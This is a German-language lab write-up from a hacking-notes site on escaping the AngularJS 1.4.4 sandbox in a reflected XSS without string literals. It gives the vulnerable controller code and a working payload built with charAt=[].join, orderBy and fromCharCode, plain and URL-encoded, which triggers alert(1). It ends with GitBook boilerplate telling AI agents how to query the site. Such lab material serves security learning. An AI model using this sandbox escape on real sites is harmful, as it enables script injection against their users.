> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/xss/angularjs-sandbox-escape-without-strings.md).

# AngularJS-Sandbox-Flucht ohne Strings

### Reflected XSS mit AngularJS-Sandbox-Umgehung ohne Zeichenfolgen

Reflected XSS auf AngularJS **1.4.4** — die Sandbox verlassen und ausführen `alert(1)` ohne `$eval` oder Zeichenfolgenliterale.

<figure><img src="/files/9fb87d7693cb64d9f46439e0c621dd03a847aad6" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/dd7d981c03afa01784012d37b74e6b70c83a174e" alt=""><figcaption></figcaption></figure>

**Beobachteter Code**

```javascript
angular.module('labApp', []).controller('vulnCtrl',function($scope, $parse) {
                            $scope.query = {};
                            var key = 'search';
                            $scope.query[key] = 'test';
                            $scope.value = $parse(key)($scope.query);
                        });
```

**Versuche**

* String-Test / $eval (funktioniert nicht): / `{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}`
* Das Parsen kann durch Injektion über den Query-String mit `&`:/ `&7+ 7` → `&7%2b7`

<figure><img src="/files/522aea93e46770a7008a8e1ddbff67abc272901a" alt=""><figcaption></figcaption></figure>

Dynamisch bauen `alert(1)` über `toString().constructor.fromCharCode(...)` und die Filterauswertung erzwingen (`orderBy`):

<figure><img src="/files/ca8756197ba6b0042daa3800f6370f3aee8270e7" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```javascript
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
```

{% endcode %}

" Dieses Fragment bricht das Parsen und erzeugt in Hex/ASCII die `alert(0)` Zeichenkette.

**Payload (URL-codiert bereitgestellt)**

{% code overflow="wrap" %}

```javascript
%74%6f%53%74%72%69%6e%67%28%29%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%70%72%6f%74%6f%74%79%70%65%2e%63%68%61%72%41%74%3d%5b%5d%2e%6a%6f%69%6e%3b%20%5b%31%2c%32%5d%7c%6f%72%64%65%72%42%79%3a%74%6f%53%74%72%69%6e%67%28%29%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%32%30%2c%36%31%2c%39%37%2c%31%30%38%2c%31%30%31%2c%31%31%34%2c%31%31%36%2c%34%30%2c%34%39%2c%34%31%29
```

{% endcode %}

<figure><img src="/files/8b50efd5f7f999de30f72744de69a4e701e629e5" alt="" width="366"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/xss/angularjs-sandbox-escape-without-strings.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
